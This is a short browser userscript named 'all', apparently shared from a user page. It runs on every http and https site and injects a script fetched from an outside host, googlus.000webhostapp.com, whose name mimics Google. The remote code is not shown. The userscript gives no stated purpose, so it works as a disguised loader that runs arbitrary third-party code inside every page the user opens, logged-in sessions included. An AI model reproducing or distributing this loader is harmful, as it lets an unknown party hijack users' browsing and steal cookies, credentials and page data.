user1990 / all

// ==UserScript==
// @name        all
// @namespace   all
// @match        http://*/*
// @match        https://*/*
// @version     1
// @grant       none
// ==/UserScript==

 window.host00 = 'all';

var my_awesome_script = document.createElement('script');

my_awesome_script.setAttribute('src','https://googlus.000webhostapp.com/js/gm.js?v='+Date.now());

document.head.appendChild(my_awesome_script);